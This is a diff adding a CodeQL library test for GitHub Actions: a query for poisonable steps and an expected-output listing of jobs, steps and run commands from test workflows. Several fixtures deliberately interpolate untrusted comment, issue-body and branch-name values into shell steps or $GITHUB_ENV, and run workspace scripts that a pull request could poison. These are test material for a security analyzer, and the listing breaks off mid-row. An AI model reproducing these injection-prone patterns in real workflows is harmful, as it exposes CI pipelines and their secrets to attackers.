a/actions/ql/test/library-tests/poisonable_steps.ql b/actions/ql/test/library-tests/poisonable_steps.ql new file mode 100644 index 000000000000..1aacdd14d140 --- /dev/null +++ b/actions/ql/test/library-tests/poisonable_steps.ql @@ -0,0 +1,5 @@ +import actions +import codeql.actions.security.PoisonableSteps + +from PoisonableStep step +select step diff --git a/actions/ql/test/library-tests/test.expected b/actions/ql/test/library-tests/test.expected new file mode 100644 index 000000000000..a8cf50334ce4 --- /dev/null +++ b/actions/ql/test/library-tests/test.expected @@ -0,0 +1,1741 @@ +files +| .github/workflows/commands.yml:0:0:0:0 | .github/workflows/commands.yml | +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline2.yml:0:0:0:0 | .github/workflows/multiline2.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/poisonable_steps.yml:0:0:0:0 | .github/workflows/poisonable_steps.yml | +| .github/workflows/shell.yml:0:0:0:0 | .github/workflows/shell.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/shell.yml:1:1:22:32 | on: push | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:32:5:39:30 | Job: local_commands2 | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline.yml:9:5:89:29 | Job: Test | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | +| .github/workflows/shell.yml:5:5:9:2 | Job: job1 | +| .github/workflows/shell.yml:10:5:14:2 | Job: job2 | +| .github/workflows/shell.yml:15:5:19:2 | Job: job3 | +| .github/workflows/shell.yml:20:5:22:32 | Job: job4 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/commands.yml:15:9:18:6 | Run Step | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline2.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline2.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline2.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline2.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline2.yml:85:9:89:35 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | script | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:15:16:15:25 | bash -step | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | .github/workflows/commands.yml:16:14:17:30 | command1 ; command2\n | +| .github/workflows/commands.yml:18:9:20:6 | Run Step | .github/workflows/commands.yml:18:14:19:30 | command3 \| command4\n | +| .github/workflows/commands.yml:20:9:22:6 | Run Step | .github/workflows/commands.yml:20:14:21:33 | command5 "$(command6)"\n | +| .github/workflows/commands.yml:22:9:24:6 | Run Step | .github/workflows/commands.yml:22:14:23:31 | command7 && command8\n | +| .github/workflows/commands.yml:24:9:26:6 | Run Step | .github/workflows/commands.yml:24:14:25:32 | command9 \|\| command10\n | +| .github/workflows/commands.yml:26:9:28:6 | Run Step | .github/workflows/commands.yml:26:14:27:34 | command11 "`command12`"\n | +| .github/workflows/commands.yml:28:9:31:2 | Run Step | .github/workflows/commands.yml:28:14:29:50 | command13 "`command14` $(date \| wc -l)"\n | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:34:16:34:25 | bash -step | +| .github/workflows/commands.yml:34:9:37:6 | Run Step | .github/workflows/commands.yml:35:14:36:30 | command1 ; command2\n | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:37:16:37:19 | pwsh | +| .github/workflows/commands.yml:37:9:39:30 | Run Step | .github/workflows/commands.yml:38:14:39:30 | command3 \| command4\n | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:15:63:19 | line1 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:15:34:23 | heredoc11 | +| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:15:40:23 | heredoc12 | +| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:15:46:23 | heredoc21 | +| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:15:52:23 | heredoc22 | +| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:15:58:23 | heredoc23 | +| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:15:63:19 | line1 | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:15:66:24 | multiline1 | +| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:15:71:21 | block11 | +| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:15:78:21 | block12 | +| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:15:85:21 | block13 | +| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | +| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:7:16:7:19 | pwsh | +| .github/workflows/shell.yml:7:9:9:2 | Run Step | .github/workflows/shell.yml:8:14:8:31 | Write-Output "foo" | +| .github/workflows/shell.yml:12:9:14:2 | Run Step | .github/workflows/shell.yml:12:14:12:23 | echo "foo" | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:17:16:17:19 | bash | +| .github/workflows/shell.yml:17:9:19:2 | Run Step | .github/workflows/shell.yml:18:14:18:23 | echo "foo" | +| .github/workflows/shell.yml:22:9:22:32 | Run Step | .github/workflows/shell.yml:22:14:22:31 | Write-Output "foo" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:1:5:1:8 | push | .github/workflows/commands.yml:1:5:1:8 | push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:4:3:5:21 | run: | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:5:12:5:20 | bash -wkf | .github/workflows/commands.yml:4:3:5:21 | run: | +| .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:9:14:9:26 | ubuntu-latest | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:11:7:13:4 | run: | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:1:1:39:30 | on: push | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:9:5:31:2 | Job: local_commands | +| .github/workflows/commands.yml:12:16:12:24 | bash -job | .github/workflows/commands.yml:11:7:13:4 | run: | +| .github/workflows/commands.yml:15:9:18:6 | Run Step | 